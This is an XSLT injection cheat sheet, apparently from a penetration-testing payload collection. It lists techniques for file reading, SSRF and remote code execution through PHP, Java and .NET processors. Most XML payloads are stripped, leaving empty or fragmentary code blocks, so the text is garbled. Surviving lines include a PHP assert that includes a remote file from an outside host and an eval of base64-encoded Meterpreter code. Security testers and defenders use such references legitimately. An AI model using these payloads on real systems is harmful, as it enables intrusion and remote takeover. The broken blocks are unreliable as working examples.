# XSLT Injection > Processing an unvalidated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code ## Summary - [Tools](#tools) - [Exploit](#exploit) - [Determine the vendor and version](#determine-the-vendor-and-version) - [External Entity](#external-entity) - [Read files and SSRF using document](#read-files-and-ssrf-using-document) - [Remote Code Execution with Embedded Script Blocks](#remote-code-execution-with-embedded-script-blocks) - [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper) - [Remote Code Execution with Java](#remote-code-execution-with-java) - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net) - [References](#references) ## Tools ## Exploit ### Determine the vendor and version ```xml ``` ```xml
Version:
Vendor:
Vendor URL: ``` ### External Entity ```xml ]> Fruits &ext_file;: - : ``` ### Read files and SSRF using document ```xml Fruits: - : ``` ### Remote Code Execution with Embedded Script Blocks ```xml --- BEGIN COMMAND OUTPUT --- --- END COMMAND OUTPUT --- ``` ### Remote Code Execution with PHP wrapper Execute the function `readfile`. ```xml ``` Execute the function `scandir`. ```xml ``` Execute a remote php file using `assert` ```xml include("http://10.10.10.10/test.php") ``` Execute a PHP meterpreter using PHP wrapper. ```xml eval(base64_decode('Base64-encoded Meterpreter code')) ``` ### Remote Code Execution with Java ```xml ``` ```xml . ``` ### Remote Code Execution with Native .NET ```xml
``` ## References * [From XSLT code execution to Meterpreter shells - 02 July 2012 - @agarri](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html) * [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection) * [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)